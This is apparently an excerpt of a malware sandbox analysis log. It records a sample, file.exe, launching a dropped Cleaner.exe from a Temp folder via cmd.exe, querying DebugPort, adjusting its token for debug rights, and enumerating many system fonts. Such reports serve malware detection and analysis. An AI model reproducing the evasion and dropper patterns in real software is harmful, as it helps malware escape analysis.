Source: Amcache.hve.30.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" Jump to behavior
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program manager^
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior